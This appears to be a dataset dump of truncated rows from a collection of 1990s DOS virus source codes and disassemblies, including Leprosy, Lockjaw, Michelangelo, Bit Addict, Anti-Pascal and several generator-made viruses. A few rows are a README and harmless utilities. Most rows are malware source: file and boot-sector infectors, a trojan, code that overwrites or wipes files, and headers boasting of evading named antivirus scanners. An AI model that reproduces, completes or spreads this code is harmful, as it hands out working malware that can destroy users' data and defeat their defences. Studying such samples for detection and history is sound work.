text
stringlengths
0
20k
; mortir.asm : Mortir - le virus de francais ; Created with Biological Warfare - Version 0.90 by MnemoniX PING equ 0D8FAh PONG equ 0F2BEh STAMP equ 17 MARKER equ 06971h code segment org 0 assume cs:code,ds:code s...
; ; ; org 100h ofs: push 100h push ax push ds push es mov dx,054h-(ofs/16) mov es,dx mov ax,es:ofs[0] cmp ax,ofs[0] je to_...
;**************************************************************************** ;* Mini non-resident virus ;**************************************************************************** cseg segment assume cs:cseg,ds:cseg,es:cseg,ss:cseg .RADIX 16 FILELEN ...
; ========================================================================> ; MutaGenic Agent ][ - MutaGen V1.3 Test Virus ; by MnemoniX 1994 ; ; A simple resident .COM infector implementing MutaGen. ; To assemble: ; TASM mg2 ; TLINK /t mg2 mutagen ; =====================================================...
; This is a disassembly of the much-hyped michelangelo virus. ; As you can see, it is a derivative of the Stoned virus. The ; junk bytes at the end of the file are probably throwbacks to ; the Stoned virus. In any case, it is yet another boot sector ; and partition table infector. michelangelo segment byte public...
L0100: JMP L08D0 MOV AH,09H MOV DX,010CH INT 21H L010A: INT 20H L010C: DB 'Murphy virus V1.00 (V1277)$' DB 1961 DUP (1) L08D0: JMP L0C51 NOP ; \ NOP ; \ NOP ; \ L08D6: MOV AH,09H ; \ MOV DX,010CH ; > ORIGINAL 24 BYTES INT 21H ; / L08DD: INT 20H ; / ; / L08DF: DB 'Mu...
; (C) Copyright VirusSoft Corp. Sep., 1990 ; ; This is the SOURCE file of last version of MASTER,(V500),(MG) ect. ; virus, distributed by VirusSoft company . First version was made ; in May., 1990 . Please don't make any corections in this file ! ; ; Bulgaria, Varna ; ...
;LOKJAW-ZWEI: an .EXE-infecting spawning virus with retaliatory ;anti-anti-virus capability. For Crypt Newsletter 12, Feb. 1993. ; ;LOKJAW-ZWEI is a resident spawning virus which installs itself in ;memory using the same engine as the original Civil War/Proto-T virus. ;It is simpler in that none of its...
/* This file is part of the source code to the LEPROSY Virus 1.00 Copy-ya-right (c) 1990 by PCM2. This program can cause destruction of files; you're warned, the author assumes no responsibility for damage this program causes, incidental or otherwise. This program is not intended for general distribu...
.code .radix 16 org 100 start: jmp temp ; The next two lines will be patched in ; cld ; DAME may have altered DF ; mov bx,ds call calc_off old4 dw 20cdh, 0 fmask db '*.com',0 dmask db '.....
PAGE ,132 VIRUS SEGMENT PARA PUBLIC 'CODE' ASSUME CS:VIRUS,DS:VIRUS call gyilk int 20h nop gyilk: push ax push bx push cx push dx push es push ds push di push si call cim cim: pop bx mov si,5aa5h mov di,55aah push cs pop es ujra: add bx,1000 cmp bx,1000 jnc kilep1 jmp kilep kilep1: push bx mov ax,2...
code segment assume cs:code org 100h start: jmp begin org 200h begin: jmp short beg FileSize dw 0E00h; 02h int21vec dd 0 ; 04h oldint13 dd 0 ; 08h oldint24 ...
page 65,132 title The 'Lehigh' Virus ; ͻ ; British Computer Virus Research Centre ; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England ; Telephone: Domestic 0273-26105, International +44-273-26105 ; ...
;**************************************************************************** ;* Little Brother version 3 ;* ;* Compile with MASM 4.0 ;* (other assemblers will probably not produce the same result) ;* ;* Disclaimer: ;* This file is only for educational purposes. The author takes no ;* responsibility for anythi...
page ,132 name LiquidCodeCANCER title LQCancer - a mutation of the V-847 virus .radix 16 code segment assume cs:code,ds:code org 100 olddta equ 80 virlen equ offset endcode - offset start smalcod equ offset endcode - offset transf buffer equ offset endcode + 100 newdta equ offset endcode + 10 fname = newdta + 1E...
CODE_SEG SEGMENT ASSUME CS:CODE_SEG,DS:CODE_SEG,ES:CODE_SEG ORG 100H ;Start off right for a .COM file ENTRY: JMP LOCATE ;Skip over Data area COPY_RIGHT DB '(C)1985 S.Holzner' ;Author's Mark FOUND_MSG DB 13,10,13,10,'FOUND IN $' ...
;**************************************************************************** ;* Little Brother version 2 ;* ;* Compile with MASM 4.0 ;* (other assemblers will probably not produce the same result) ;* ;* Disclaimer: ;* This file is only for educational purposes. The author takes no ;* responsibility for anythi...
; <LEPROSYB.ASM> - Leprosy-B Virus Source ; Copy-ya-right (c) 1990 by PCM2. ; ; This file is the source code to the Leprosy-B virus. It should ; be assembled with an MASM-compatible assembler; it has been tested ; and assembles correctly with both MASM 4.0 and Turbo Assembler 1.0. ; It s...
; <LEPROSYB.ASM> - Leprosy-B Virus Source ; Copy-ya-right (c) 1990 by PCM2. ; ; This file is the source code to the Leprosy-B virus. It should ; be assembled with an MASM-compatible assembler; it has been tested ; and assembles correctly with both MASM 4.0 and Turbo Assembler 1.0. ; It s...
;**************************************************************************** ;* * ;* ASM Source Code For: * ;* Little Brother Virus - Version 1 * ;* ...
; <LEPROSYB.ASM> - Leprosy-B Virus Source ; Copy-ya-right (c) 1990 by PCM2. ; ; This file is the source code to the Leprosy-B virus. It should ; be assembled with an MASM-compatible assembler; it has been tested ; and assembles correctly with both MASM 4.0 and Turbo Assembler 1.0. ; It s...
COMMENT* Change ROR -> ROL in the TWO marked places to produce UNLOCK.ASM * CODE_SEG SEGMENT ASSUME CS:CODE_SEG ORG 100H HERE: JMP THERE COPY_RIGHT DB '(C)1985 Steven Holzner' PROMPT DB 'Phrase: $' ;All the messages & prompts DEFAULT DB ...
;LOKJAW-DREI: an .EXE-infecting spawning virus with retaliatory ;anti-anti-virus capability. For Crypt Newsletter 12, Feb. 1993. ; ;LOKJAW-DREI is a resident spawning virus which installs itself in ;memory using the same engine as the original Civil War/Proto-T virus. ;It is simpler in that none of its...
name Virus title Disassembly listing of the VHP-648 virus .radix 16 code segment assume cs:code,ds:code org 100 environ equ 2C start: jmp virus message db 'Hello, world!$' mov ah,9 mov dx,offset message int 21 int 20 virus: push cx ;Save CX mov dx,offset data ;Restore original first instruction modify...
;----------------------------------------------------------------------------- ;Lizard by Reptile/29A (another version ;) ;----------------------------------------------------------------------------- ; ; ; ; ...
;title LPTPORT.ASM - Switch Printer Ports Between LPT1: and LPT2: ; ; (C) Copyright 1984, Dickinson Associates Inc. ; ROM_BIOS_DATA segment at 40h ; Low Memory "BIOS" Parameters at 40H org 8h ; Printer port addresses are at byte 8 PRINTER_BASE dw 4 dup(?) ; Four words for Printer Port ; I/O Address Locations...
;LOCKJAW: a .COM-infecting resident virus with retaliatory ;anti-anti-virus capability. Programmed and contributed by Nikademus, for ;Crypt Newsletter 12, Feb. 1993. ; ;LOCKJAW is a resident virus which installs itself in ;memory using the same engine as the original Civil War/Proto-T virus. ; ;LOCKJAW...
; LMD.2000 ; Resident Polymorphic COM Infector ; Virus Reroutes Int 21h Handler through Int 84h and uses Int 84h for ; virus function calls. Int 21h Function 4Bh (Set Execution State) is hooked ; for infection routine. Virus prepends its body to files and writes 2000 ; original bytes to end of file. Polymorphic rou...
; Virusname: LISA ; Origin: Sweden ; Author: Metal Militia ; Date: 24/12/1994 ; ; This virus can't be found with any anti-virus program (of the below ; that is) SCAN/TB-SCAN/F-PROT/SOLOMON. This because of that it's totally ; new written. ; ; It's a non-resident, encrypted, .com infector that spread with the ; "dot-dot...
; ------------------------------------------------------------------------- ; ; Lacimehc v1.0 coded by KilJaeden of the Codebreakers 1998 ; ; ------------------------------------------------------------------------- ; ; Description: `-------------------| Started: 13/06/98 | Finished: 15/06/98 ; ; ...
; Virus generated by G 0.70 ; G written by Dark Angel of Phalcon/Skism ; File: LOVELOCK.ASM ; Lovelock by Ender checkres1 = 'DA' checkres2 = 'PS' id = 'DA' .model tiny .code ; Assemble ...
ussr516 segment byte public assume cs:ussr516, ds:ussr516 org 100h ; Disassembled by Dark Angel of PHALCON/SKISM ; for 40Hex Number 7 Volume 2 Issue 3 stub: db 0e9h, 0, 0 db 0e9h, 1, 0, 0 ; This is where the virus really begins start: ...
# virii Collection of ancient computer virus source codes (mostly). There should be around 2000 files in this repository with a few being Pascal source codes or assembled [COM](https://en.wikipedia.org/wiki/COM_file) files. A portion of the source codes are also result of reverse engineering and most if not all of it...
PAGE 59,132 ; ; ; HYDRA6 ; ; Created: 27-Aug-91 ; Passes: 5 Analysis Options on: AW ; Copyright (c) ; ; psp_cmd_size equ 80h data_14e equ 174h data_15e equ 177h seg_a segmen...
.radix 16 sub bl,bl mov cx,offset msg-calldos-2 mov si,offset calldos cld lpp: lodsb xor bl,al loop lpp mov byte ptr [checksum],bl mov bp,offset adjust call install1 mov dx,offset Hellomsg mov ah,9 int 21 int 20 Hellomsg db 0a,0dh,'OK friend...',0a,0dh,'$' Virus_lenght equ endcode-adjust a...
; HEEVAHAV.ASM -- HEEVAHAVA VIRUS ; Created with Nowhere Man's Virus Creation Laboratory v1.00/TASM ; Written by URNST KOUCH ; This is a spawning virus I decided to take to the limit, ; to step on the accelerator of the VCL, so to speak. ; HEEVAHAVA virus is a 'companion' .EXE infector which will attempt ; to infect al...
; Hate.524 (named by Moi because of Internal Text and Size) ; Uninteresting Encrypted COM Infector ; Source code compliments of PakiLad p386n seg000 segment byte public 'CODE' use16 assume cs:seg000 org 100h assume es:nothing, ss:nothing, ds:seg000, fs:nothing,...
; VirusName : Human Greed ; Origin : Sweden ; Author : The Unforgiven ; Date : 20/12/93 ; ; This is a "mutation" of the Infernal Demand virus, written by Metal ; Militia. Even if it's high modified, its ground is still the same. ; This is yet another of this simple overwriting virus, and it's ; nothing re...
.radix 16 ;WARNING: THIS IS NOT A BASIC RELEASE BUT A WORK COPY! ;It seems that somebody had steal this version and ;circulates it now. title The Naughty Hacker's virus version 3.0 comment / Naughty Hacker wishes you the best ! / jmp start virlen equ offset endcode-offset begin alllen equ offset buffer-off...
PAGE 59,132 ; ; ; HYDRA7 ; ; Created: 27-Aug-91 ; Passes: 5 Analysis Options on: AW ; Copyright (c) ; ; psp_cmd_size equ 80h data_16e equ 170h data_17e equ 173h seg_a segmen...
tic segment org 100h assume cs:tic, ds:tic, es:tic ; len equ offset last-100h ;LENGTH OF VIRUS CODE ; start: mov bx,0fh ;KLUDGE TO AVOID MEMALLOC ERROR mov ah,4ah int 21h mov ...
tic segment org 100h assume cs:tic, ds:tic, es:tic len equ offset last-100h start: mov si,0100h push si mov ax,cs add ah,10h mov es,ax xor di,di mov cx,len rep movsb mov dx,0FE00h ...
; Trojan Horse Constructed with... ; The Trojan Horse Construction Kit, v1.00 ; Copyright(c) 1992, Stingray/VIPER ; A Viral Inclined Programming Experts Ring Programming Team Production. IDEAL DOSSEG MODEL small STACK 256 DATASEG msg_1 db "",13,10 db "This is a Trojain horse. Curtocy of White Shark! HA H...
;This is the HCarry Virus ;dedicated to the late Harry Carry ;The only AV scanner that I know of that detects this virus is TBAV Scanner start: ;start of virus! lea si, crypt_start mov di,si mov cx,end - crypt_start call crypt jmp crypt_start xor_value db 0 crypt: lodsb xor al,byte ptr [xor_value] stosb...
tic segment org 100h assume cs:tic, ds:tic, es:tic ; len equ offset int21-100h ;LENGTH OF VIRUS CODE ; ;THE FOLLOWING CODE MAKES THE VIRUS GO RESIDENT. TO KEEP THE INFECTION ;CODE AS SHORT AS POSSIBLE, THE INT 21 VECTOR (4 BYTES) IS SAVED OUTSIDE ;THE VIRUS...
PAGE 59,132 ; ; ; HYDRA1 ; ; Created: 27-Aug-91 ; Passes: 5 Analysis Options on: AW ; Copyright (c) ; ; psp_cmd_size equ 80h data_12e equ 100h data_13e equ 193h data_14e equ 1...
NAME boot PAGE 55,132 TITLE FILE UTIL code segment ASSUME CS:CODE,DS:CODE,ES:CODE org 100h main: jmp over db '[' id db 'HiDos]',0 by db 'By Apache',0 over: xor ax,ax mov ds,ax ...
; HellSpawn Virus (c) 1993 by Stormbringer ; ; ; Stormbringer ;  ; .model tiny .radix 16 .code org 100 start: jmp EntryPoint ...
PAGE 59,132 ; ; ; HYDRA2 ; ; Created: 27-Aug-91 ; Passes: 5 Analysis Options on: AW ; Copyright (c) ; ; data_1e equ 100h data_2e equ 235h data_3e equ 257h data_4e equ 522h...
PAGE 59,132 ; ; ; HYDRA8 ; ; Created: 28-Aug-91 ; Passes: 5 Analysis Options on: W ; Copyright (c) ; ; psp_cmd_size equ 80h data_17e equ 1EFh data_18e equ 1F2h data_19e equ 9D...
PAGE 59,132 ; ; ; HYDRA5 ; ; Created: 21-Aug-91 ; Passes: 5 Analysis Options on: AW ; Copyright (c) ; ; data_1e equ 23Eh psp_cmd_size equ 80h data_17e equ 187h data_18e equ 1...
_attr_ equ 0 _date_ equ 2 _time_ equ 4 fil equ 6 mov ax,4245h ;sepuku! int 21h jmp short jump1 db 'DY' dy equ $-2-100h _size dw offset total-100h _ofs dw offset total db 'McAfee, geht nach Hause! Wir sind unberwindlich!' jump1:...
.model tiny .code org 100h start: jmp short begin_code copyright db "HYBRiS.1435 Remover. (c) 1995 The Unforgiven/Immortal Riot",0 begin_code: push dx ; Cool self-check.. push ds mov ah,9 mov dx,offset intro_msg int 21h pop bx pop dx cmp bx,dx jne ...
PAGE 59,132 ; ; ; HYDRA4 ; ; Created: 28-Aug-91 ; Passes: 5 Analysis Options on: AW ; Copyright (c) ; ; psp_cmd_size equ 80h data_11e equ 100h data_12e equ 154h data_13e equ 1...
tic segment org 100h assume cs:tic, ds:tic, es:tic ; len equ offset int21-100h ;LENGTH OF VIRUS CODE ; start: mov ax,9000h ;MOVE VIRUS CODE UP mov es,ax mov di,si mov cx,len ...
;NAME: HR.DEC ;FILE SIZE: 0062Ch - 1580d ;START (CS:IP): 00100h ;CODE END: 0072Ch ;CODE ORIGIN: 00100h ;DATE: Sun Aug 02 17:20:02 1992 CODE SEGMENT BYTE PUBLIC 'CODE' ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING P00100 PROC ORG 0100h START: JMP Short BEGIN ;--------...
PAGE 59,132 ; ; ; HYDRA3 ; ; Created: 27-Aug-91 ; Passes: 5 Analysis Options on: AW ; Copyright (c) ; ; psp_cmd_size equ 80h data_11e equ 100h data_12e equ 156h data_13e equ 1...
#include <process.h> #include <stdlib.h> #include <stdio.h> #include <conio.h> #include <dir.h> #include <dos.h> #define INTR 0X1C #ifdef __cplusplus #define __CPPARGS ... #else #define __CPPARGS #endif void interrupt ( *oldhandler)(__CPPARGS); void interrupt handler(__CPPARGS) { delay(135); oldhandler(); }...
.model tiny .code .radix 16 ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE org 0100h CALL EntryPoint ; Call virus entry point ; Here begin virus by himself EntryPoint: POP BP ; Restore in BP address of data area PUSH BX ; Save BX PUSH CX ; Save CX ...
.radix 16 ;********************************* ;* The Naughty Hacker's virus * ;*VERSION 3.1 (And not the last.)* ;* ( V1594 ) * ;* Finished on the 10.04.1991 * ;* * ;* Glad to meet you friend! * ;* * ;********...
; ATTR.ASM -- File Attribute Utility ; ================================== CSEG Segment Assume CS:CSEG, DS:CSEG, ES:CSEG, SS:CSEG Org 0080h Parameter Label Byte ; Parameter is here Org 0100h Entry: Jmp Begin ; Entry Point ; Most Data (some more at end of program) ; --------------------------------------- ...
page ,132 name AP440 title The 'Anti-Pascal' virus, version AP-440 .radix 16 ; ͻ ; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ; ; The 'Anti-Pascal' Virus, version AP-440 ...
PAGE 59,132 ; ; ; AFRCA109 ; ; Created: 16-Sep-92 ; Passes: 5 Analysis Options on: AW ; ; data_2e equ 4F43h data_3e equ 0FE00h seg_a segment byte public assume cs:seg_a, ds:seg_a org 100...
; BIT ADDICT Versie 2.10 ;----------------------------------------------------------------------------- ;----- ----- ;----- Macros en andere hulpmiddellen ----- ;----- ...
jmpc macro Dest local Skip jnc Skip jmp Dest Skip: endm jmpnc macro Dest local Skip jc Skip jmp Dest Skip: endm jmpe macro Dest local Skip jnz Skip jmp Dest Skip: endm jmpne macro Dest local Skip jz Skip jmp Dest Skip: endm code segment...
.286c .model small .code org 100h start: jmp install old_si dw 0 old_bx dw 0 old_cx dw 0 old_dx dw 0 es_main dw 0 num_ff dw 0 last_pag dw 0 viroff dw 0 count db 0 scan_seg dw 0 mes db 'Found !','$' filnm db 15 dup(0) buffer db 'NCMAIN.EXE',0h,0h,0h,0h,0h db 'QA.COM', db ...
Name ANNA Page 55,132 Title ???? len equ offset marker+5-offset main2 level1len equ offset level1-offset main3 level2len equ offset level2-offset main3 code segment assume cs:...
PAGE 59,132 ; ; ; AMBULANC ; ; Created: 13-Feb-92 ; Passes: 5 Analysis Options on: none ; ; data_1e equ 0Ch data_2e equ 49h data_3e equ 6Ch psp_envirn_seg equ 2Ch data_20e equ 0C80h seg_a segm...
page ,132 name AP400 title The 'Anti-Pascal' virus, version AP-400 .radix 16 ; ͻ ; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ; ; The 'Anti-Pascal' Virus, version AP-400 ...
code segment org 0 call Virus Displacement equ $ SavedCode db 0cdh,020h,11 dup (090h) OldInt21 dd 0 Count db 0 Jump db 0e9h NearOfset dw 0 ID db 'Bit Addict says: ',13,10 db '"You have a good taste for hard disks, it was delicious!"' db '$' NewInt21: cmp ax,0ffffh jne Ok cmp dx,ax jne Ok mov ax,cs ...
;-----------------------------------------------------------------------; ; This virus is of the "FLOPPY ONLY" variety. ; ; It replicates to the boot sector of a floppy disk and when it gains control ; it will move itself to upper memory. It redirects the keyboard ; ; interrupt (INT 0...
;-----------------------------------------------------------------------; ; This virus is of the "FLOPPY ONLY" variety. ; ; It replicates to the boot sector of a floppy disk and when it gains control ; it will move itself to upper memory. It redirects the keyboard ; ; interrupt (INT 0...
.286 .model small include push.mac .code assume cs:_TEXT,ds:_TEXT org 000h next_dev dd 0FFFFFFFFh devatt dw 8000h dw offset strategy dw offset interrupt nam db 'antigame' start proc far old_si dw 0 old_bx ...
; ; ; AntiCARO ; by Mister Sandman/29A ; ; ; ; As i don't agree with CARO and with the way the name viruses, a...
code segment assume cs:code,ds:code,es:code org 0 Size2 equ Virus-Relocate mov cx,Size2 mov ax,word ptr ds:[101h] call Virus Relocate: cmp byte ptr ds:[103h],100 jb InstallVirus xor dx,dx Repeat: push dx mov ax,2 xor bx,bx mov cx,100 int 26h pop ax pop dx add dx,100 jnc Repeat cli Hangup: jmp Han...
; ; ; AVP-Aids, ; by Tcp/29A ; ; ; ; AVP is probably the best antivirus nowadays, but it's the most...
PAGE 60,132 ; ; ; ANTICST ; ; Created: 4-Mar-91 ; ; data_1e equ 4Ch ; (0000:004C=31h) data_2e equ 4Eh ; (0000:004E=70h) data_3e equ 84h ; (0000:0084=0E3h) data_4e equ 86h ; (0000:0086=161Ah) data_5e ...
page ,132 name CANCER title Cancer - a mutation of the V-847 virus .radix 16 code segment assume cs:code,ds:code org 100 olddta equ 80 virlen equ offset endcode - offset start smalcod equ offset endcode - offset transf buffer equ offset endcode + 100 newdta equ offset endcode + 10 fname = newdta + 1E virlenx = o...
code segment org 0 call Virus SavedCode db 0cdh,020h,11 dup(090h) Jump db 0e9h NearOfset dw 0 ID db 'BIT ADDICT' ExeHead db 'MZ' SaveInt21 equ this word OldInt21 dd 0 Teller db 0 Message db 'The Bit Addict says: ',13,10 db '"You have a good taste for hard disks, it was delicious !!!"' db 13,10,'$' NewI...
; this is ripped off from pd code in RBBS-ASM (was ANSI1-7.ASM) ; has been heavily modified by M. Kimes, who isn't much of an ; asm-programmer. Now works with C in a strange way and supports ; configurable window. It's momma wouldn't know it now (and probably ; would claim it's the type of program she warned it about...
; AZUSA virus ; ; Discovered an commented by Ferenc Leitold ; Hungarian VirusBuster Team ; Address: 1399 Budapest ; P.O. box 701/349 ; HUNGARY 217D:0100 E98B00 JMP 018E ; Jump to main ...
; AH.asm : Mess with White Shark and you'll be eaten alive! ; Created with Biological Warfare - Version 0.90 by MnemoniX PING equ 0AE8Eh PONG equ 0A09Eh STAMP equ 31 MARKER equ 05753h code segment org 0 assume cs:...
; Bit Addict Versie 9 ;----------------------------------------------------------------------------- ;----- ----- ;----- Macros en andere hulpmiddellen ----- ;----- ...
; Bit Addict Versie 4 ;----------------------------------------------------------------------------- ;----- ----- ;----- Macros en andere hulpmiddellen ----- ;----- ...
page ,132 name V847 title The V-847 virus .radix 16 code segment assume cs:code,ds:code org 100 timer equ 6C olddta equ 80 virlen equ offset endcode - offset start smalcod equ offset endcode - offset transf buffer equ offset endcode + 100 newdta equ offset endcode + 10 fname = newdta + 1E virlenx = offset endcod...
; BIT ADDICT Versie 2.00 ; ; Dit virus besmet exe en com-files, en als het opgestart wordt dan reserveert ; hij 2 diskbuffers en copieert het virus daarheen om resident te blijven. ; Als het virus resident is dan gaat hij in de environment naar de comspec ; zoeken en besment dan de command interpreter (meestal COMMAND....
;****************************************************************************** ; ; Virus name : Andropinis ; Author : Rajaat ; Origin : United Kingdom, March 1995 ; Compiling : Using TASM | Using A86 ; | ; TASM /M2 ANDROPIN.ASM | A86...
; NAME: Abdo.com ; AUTHOR: Sea4 ; SIZE: 310 bytes ; ENCRYPTION: Yep ; STEALTH: Nope ; ROI: All files in current DIR ; DT: Nope ; Here is an interesting concept in encryption. Brought to my attention by ; Aperson. The virus will use the host programs own bytes to XOR against. Its ; very interesting because there is no ...
; VirusName: Arbeit Macht Frei! ; Country : Sweden ; Author : The Unforgiven / Immortal Riot ; Date : 01/10-1993 ; ; ; This is a mutation of the Seventh son of a seventh son virus. ; Metal Militia mutated this one for the first issue of our ; magazine, (Insane Reality), but here comes my contribution.. ; ; This ...
; Virus generated by G 0.70 ; G written by Dark Angel of Phalcon/Skism ; File: ARCHIVE.ASM ; <ArchivE> by <Gehenna> id = 'FE' .model tiny .code ; Assemble with: ; TASM /m3 filename.ASM ; TLINK /t filename.OBJ ...
page ,132 name AP480 title The 'Anti-Pascal' virus, version AP-480 .radix 16 ; ͻ ; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ; ; The 'Anti-Pascal' Virus, version AP-480 ...
;-----------------------------------------------------------------------; ; This virus is of the "FLOPPY ONLY" variety. ; ; It replicates to the boot sector of a floppy disk and when it gains control ; it will move itself to upper memory. It redirects the keyboard ; ; interrupt (INT 0...
; AntiTBC - written by Conzouler/IR 1995 ; ; Based on RSV. ; ; Features: ; memory resident ; com-append on execute ; no tb-flags (of course) ; no f-prot heuristics ; fools tbclean (look at the restore routine) ; .model tiny .code org 100h psize equ (offset last - offset entry) / 10h + 2 size equ ...
; AntiIVT - written by Conzouler/IR 1995 ; ; A virus based on RSV which fool Invircible's test program. ; ; Features: ; memory resident ; com-append on execute ; no tb-flags (of course) ; no f-prot heuristics ; fools invircible test ; .model tiny .code org 100h psize equ (offset last - offset entry) / ...
;| ;| ANSI-BOMB BY TESLA 5 ;| ;| THIS VIRUS IS LOSELY BASED ON THE WEFLOW 1993 VIRUS, WHICH WAS BASED ;| ON TRIDENT OVERWRITING VIRUS, MADE BY .... OF TRIDENT. DON'T TYPE ;| THIS FILE, OR WHEN YOU PRESS 'ENTER' YOUR DIR WILL BE ERASED. GREETINGS ;| TO TRIDENT, NUKE, PHALCOM/SKISM AND YAM. YOU D...
From netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!utnut!torn!uunet.ca!uunet.ca!io.org!grin.io.org!scottjp Sat Jan 14 12:10:08 1995 Xref: netcom.com alt.comp.virus:961 Path: netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!utnut!torn!uunet.ca!uunet.ca!io.org!grin.io.org!scottjp From: scottj...
page ,132 name V345 title V-345 - a mutation of the V-845 virus .radix 16 code segment assume cs:code,ds:code org 100 timer equ 6C olddta equ 80 virlen = offset endcode - offset start newid = offset ident - offset start start: jmp short virus ident dw 'VI' counter db 0 allcom db '*.COM',0 progbeg dd ? eof dw ...
; archer.asm : [Archer] MnemoniX `94 ; Created with Biological Warfare - Version 0.90 by MnemoniX PING equ 0AE3Bh PONG equ 0CD28h STAMP equ 30 MARKER equ 04D4Dh code segment org 0 assume cs:code,ds:code start: ...
;-----------------------------------------------------------------------; ; This virus is of the "FLOPPY ONLY" variety. ; ; It replicates to the boot sector of a floppy disk and when it gains control ; it will move itself to upper memory. It redirects the keyboard ; ; interrupt (INT 0...
page ,132 name V852 title The V-852 virus, based on the V-847 virus .radix 16 code segment assume cs:code,ds:code org 100 timer equ 6C olddta equ 80 virlen equ offset endcode - offset start smalcod equ offset endcode - offset transf buffer equ offset endcode + 100 newdta equ offset endcode + 10 fname = newdta + ...